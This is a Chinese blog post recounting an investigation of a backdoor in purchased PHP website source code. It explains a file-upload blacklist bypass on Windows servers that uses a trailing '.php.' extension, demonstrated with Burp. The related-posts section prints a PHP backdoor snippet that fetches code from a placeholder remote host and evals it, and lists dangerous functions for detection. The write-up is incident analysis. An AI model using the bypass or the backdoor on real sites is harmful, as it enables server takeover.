php源码查后门,某一次排查源码后门的过程

最新推荐文章于 2024-05-18 11:40:11 发布
最新推荐文章于 2024-05-18 11:40:11 发布
阅读量4.3k 收藏 1
点赞数 2
文章标签: php源码查后门

源码藏后门这种事情,屡见不鲜了。文件包含,文件调用,拼接,大小马,htaccess文件做手脚等等………不过今天我就遇到个奇葩,藏了后门还不承认,非说是程序自带的。给大家看看程序结构先。

H1V1M48Ar8PywIIUA8U146.jpg

我检查了我所知道的一切后门方式。也用扫描器查找了一般,以为安全了直接上服务器部署好了,域名解析开始使用。第二天,莫名其妙登录日志有其他人了。也没太在意,觉得应该是自己登录路径和密码设的不够复杂,被人试出来了。改了一下就没管他了,因为工作原因过了两三天才有空去看看网站。一打开我惊了,登录日志一大堆不说,数据库也被人操作过……还有几个马儿躺在图片文件夹里面

Wg5ghzRmTMRgl9o9FGRGHo.jpg

这是我下载下来源码保留的马

igQh8VRM9wv6BtvgqV6zOf.jpg

后来看日志,最开始是一个UPLOAD.PHP上传过来的。并且这文件目录很深,打开代码如下

C68R8K6C5psSP6ScR3r3pr.jpg

限制了大小写,加空格,加字符串,黑名单。他是怎么传上去的?看到strrchr函数后,突然发现我是win服务器,windows系统自动去掉不符合规则符号后面的内容。

JGpxEiXTfPA3T2p8Z24bDx.jpg

这个时候我们就可以利用.来绕过限制了,因为strrchr函数会将上传的文件名后缀处理为.php.,当上传到win机器上时又会将后面的.去掉,然后后缀就又会被还原成.php,这样就可以执行了,下面演示一下

首先上传1.php文件并抓包,在burp修改文件后缀名为.php.

HL1PE92TlQJ28tLu1316Lj.jpg

成功,那么问题来了他是怎么获得我的域名的?

在public文件夹里面有个index.php。包含了一大堆文件

R1Fcf2hohrPR1rbG4lpoXp.jpg

其中printer.php里有SERVER_NAME函数和

file_get_contents函数。懂得人应该都懂了我就不教大家了。也欢迎大佬们讨论一下在自己程序植入后门算什么罪?我觉得算非法控制计算机罪。对于这种人,我们也奈何不了他。哑巴吃黄连,有苦说不出啊!

weixin_39762856
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
D盾网站源码后门木马检测工具
11-07
D盾网站源码后门木马检测工具
PHP自动发卡平台源码 v7.9 无错无后门完善版
09-03
这款v7.9版本的源码在经过细致的排查和修复后,确保了系统的安全性和稳定性,为商家提供了一个无后门、无错误的运营环境。 首先,我们来理解一下PHP自动发卡平台的核心功能: 1. **自动化售卡**: 用户可以通过平台...
出Linux下网站哪些文件被挂马的办法
寻找甘当科学家的女人/男人
02-10 3834
转自:http://www.iamle.com/archives/1557.html 2014-03-24 BY WWEK php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行与加密: eval, assert, call_user_fun
xz-utils 后门代码分析
最新发布
韩束一叶子
05-18 883
在本文中,我们围绕着 xz-utils 后门代码的整个生命周期进行分析研究,沿着后门代码的执行路径,从liblzma.so的编译阶段到sshd服务的启动阶段,分别复现了其后门的植入和安装工程,随后从后门关键函数入手,分析了后门代码的执行流程和攻击意图。通过以上 xz-utils 的后门代码分析可以看到攻击者具有高水平的技术能力,而这仍是管中窥豹,我们仅仅只是对后门代码的主流程进行分析研究,根据互联网上的多份技术报告剖析,攻击者在代码混淆、反调试、sshd日志隐藏、反汇编引擎等方面,也精心进行设计和实现;
php采集有后门,DEDE采集大师官方留后门的删除办法
weixin_35922953的博客
03-12 166
说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下询网站数据库,并进行更新、删除、询数...
php后门检测工具,phpStudy后门如何检测和修复
weixin_32331345的博客
03-09 1103
背景一篇《Phpstudy官网于2016年被入*,犯罪分子篡改软件并植入后门》让人触目惊心,从官网的下载官方安装包也会有问题,由此可想而知目前已经有多少网站已经沦陷。接到消息的第一时间,我们对以前从官网下载的一个安装包 phpStudySetup.exe 进行了检测,发现 md5=fc44101432b8c3a5140fcb18284d2797,果然也已经在涉及漏洞的列表中。来自文章的原话:”据主...
批量php加密,用php实现批量询清除一句话后门的代码
weixin_31908827的博客
03-12 130
总是忘记一句话放到哪个文件里去了,直接全部干掉...//xy7if(!isset($dir)orempty($dir)){$dir=str_replace('\','/',dirname(__FILE__));echo"".$dir."";}else{$dir=$_GET['dir'];echo"".$dir."";}$evilcode="";$testdir=opendir(...
我今天终于知道后门在代码上是如何实现的
wjp_116的专栏
03-23 5431
我们开发的程序是要在生产一线使用的,这种软件不但要考虑功能,还要考虑到使用者的知识水平和个人素质。总有人喜欢不按规程操作,把这些问题交给管理者去规范是个很挠头的事情。这样只能在代码上进行处理了。比如不能在通信过程中退出程序,否则会造成通信数据的不完整性。而如果有时我们的程序有问题时又确实要在那种情况下退出,这样就需要在代码中增加一部分,只有点击了特定的按钮顺序才能退出程序。当然这部分代码是在我们技
php做扫描功能,phpscanphp后门扫描神器
weixin_34307867的博客
03-21 1030
扫描备份工具 源码 ,python 实现, 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现能针对PHP大马,PHP小马,PHP一句话,建网站PHP执行命令,UDF提权,SQL语句,COM组件调用,上传,怎样建网站越权,等后门进行扫描。 特点: 1.误报率极低。 2.兼容各种下,w...
易支付最新版源码后门可二开
07-14
"易支付最新版源码后门可二开"意味着这个版本的源代码是经过严格审的,不包含任何后门程序,确保了系统的安全性,同时也支持二次开发,以便商家根据自身需求进行定制化调整。 1. **源码安全**:源码后门是...
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
网站源码后门辅助检测工具 0.1简体中文绿色免费版 [可以自行添加正则表达式]
05-29
网站源码后门辅助检测工具 0.1简体中文绿色免费版 [可以自行添加正则表达式]
木马后门检测分离工具包
01-25
一间后门,木马,分离 工具包。让你的电脑不再被后门困扰
后门检测工具
02-10
一款可以检测软件是否捆绑了其他软件及病毒木马的强大工具,软件本身还自带沙盘安装,让您远离病毒木马的侵害
基于PHP的全新破解域名防红系统(去除授权后门)支持分站源码.zip
10-21
【标题】中的“基于PHP的全新破解域名防红系统”是指一种使用PHP编程语言开发的安全防护系统,其主要目标是防止恶意用户通过域名跳转(防红)来规避网站的限制,同时也涉及到去除授权后门的问题,即移除可能存在的...
2023易支付+码支付聚合支付最新开心无后门源码
04-22
拥有源码意味着可以自定义功能,进行二次开发,同时也便于排查和修复潜在问题。 5. **无后门**:后门通常指软件中预留的未公开访问路径,可能被开发者用于调试或非法访问。无后门意味着源码是安全的,没有预留任何...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2847
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
php-x ip bus,手把手教你编写一个简单的PHP模块形态的后门
weixin_30151565的博客
03-09 523
看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文0×00. 引言PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个...
php源码扫描后门工具
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门的工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理通常是通过识别常见的后门代码特征,如eval、assert、system等函数的调用,或者是通过检测非常规的文件操作、远程代码执行等可疑行为。一旦发现可能存在后门的代码片段,工具会向开发者报告,以便开发者可以及时对代码进行修复和加固。 PHP源码扫描后门工具对于保障PHP代码的安全性非常重要。因为PHP是一种开放式的脚本语言,用户可以较为灵活地编写各种代码,但同时也容易受到恶意攻击者的攻击。使用这种工具可以帮助开发者及时发现并修复潜在的安全隐患,保障系统的安全性。 当然,虽然PHP源码扫描后门工具可以发挥一定的作用,但它并不是万能的。开发者在使用这种工具的同时,还需要注重编码规范和安全意识的培养,定期对代码进行审和加固,以建立一个更加健壮和安全的PHP应用系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值